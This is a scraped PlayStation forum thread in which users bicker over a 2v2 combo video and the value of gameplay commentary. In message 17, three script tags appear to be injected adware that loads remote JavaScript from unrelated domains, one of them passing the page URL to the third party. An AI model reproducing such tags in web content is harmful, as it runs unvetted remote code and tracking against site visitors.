Please use plain text.
Message 11 of 50 (134 Views)
0 Likes
Uncharted Territory
1819 posts

Re: 2v2 G Cole & E Cole Highlight Combo Video #1

Jan 15, 2013

Xis66 wrote:
This was a vid of us just having fun doin stuff new cap card.

Really? Ok, for a second there I thought it was something worth watching. :smileytongue:

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Please use plain text.
Message 12 of 50 (133 Views)
First Son
26 posts

Jan 15, 2013

Strife93 wrote:

Xis66 wrote:

Really? Ok, for a second there I thought it was something worth watching. :smileytongue:

You try to hard to be annoying...  Too much talk... When are we going to 2v2?  My team vs yours?  

Please use plain text.
Message 13 of 50 (129 Views)
0 Likes
Uncharted Territory
1819 posts

Jan 15, 2013

AsisGalvin wrote:

Strife93 wrote:

Xis66 wrote:

You try to hard to be annoying...  Too much talk... When are we going to 2v2?  My team vs yours?  

Pretty sure my team consists of more than two people.

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Please use plain text.
Message 14 of 50 (125 Views)
0 Likes
Uncharted Territory
1329 posts

Jan 15, 2013

Xis66 wrote:

Fair enough.

Just expected highlights :smileysad:

But good to know that more is coming, with commentary :smileyhappy: There are too few videos out there with commentary.

Please use plain text.
Message 15 of 50 (114 Views)
0 Likes
Uncharted Territory
1819 posts

Jan 15, 2013

HighFlyer_15 wrote:

Xis66 wrote:

Fair enough.

But good to know that more is coming, with commentary :smileyhappy: There are too few videos out there with commentary.

I never quite understood the need for commentary. If something substantial (Like a short film, or a movie) is created then sure, but someone commenting on an awesome headshot he got from a mile away? The allure just isn't there for me.

WHAT IS THIS!?
Please use plain text.
Message 16 of 50 (106 Views)
0 Likes
Uncharted Territory
1329 posts

Jan 15, 2013

Strife93 wrote:

HighFlyer_15 wrote:

Xis66 wrote:

Fair enough.

I never quite understood the need for commentary. If something substantial (Like a short film, or a movie) is created then sure, but someone commenting on an awesome headshot he got from a mile away? The allure just isn't there for me.

I see you simply "don't get it", that's what's up.

I'm not talking about something like "oh look at that headshot I just got with Radec", but if you don't see how commentary on a game like this could be, then you don't know how commentary on Smash Brothers, Street Fighter or any other fighting game for that matter could be.

Please use plain text.
Message 17 of 50 (100 Views)
0 Likes
Gaming Beast
2167 posts

Jan 15, 2013
If it's done right it can be quite entertaining and/or informative. Maximillian is a great example.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 18 of 50 (98 Views)
0 Likes
Uncharted Territory
1819 posts

[ Edited ]
Jan 15, 2013

HighFlyer_15 wrote:

Strife93 wrote:

HighFlyer_15 wrote:

Xis66 wrote:

Fair enough.

I see you simply "don't get it", that's what's up.

I'm not talking about something like "oh look at that headshot I just got with Radec", but if you don't see how commentary on a game like this could be, then you don't know how commentary on Smash Brothers, Street Fighter or any other fighting game for that matter could be.

Thanks for the reiteration, but I just alluded to that.

I'm pretty sure I would just want to play the game myself, that's kinda the point of an interactive medium. A commentary is usually "after the fact", and if you're trying to teach someone with editing done later, why not just edit in visuals? After all, "a picture's worth a thousand words".

WHAT IS THIS!?
Please use plain text.
Message 19 of 50 (96 Views)
0 Likes
First Son
26 posts

Jan 15, 2013

Fromundaman wrote:
If it's done right it can be quite entertaining and/or informative. Maximillian is a great example.

dont waste your time hes only on my post to be negative and not play anyone just talk matter fact im pretty sure he spends more time commenting on my posts than he does playing... Not really sure what hes trying to do conisdering hes does nothing to help the community improve.... No tips, no combo vids, etc... At least I have something to offer these people you know so dont mind him.  Also did you see my new combo vid?

Please use plain text.
Message 20 of 50 (83 Views)
0 Likes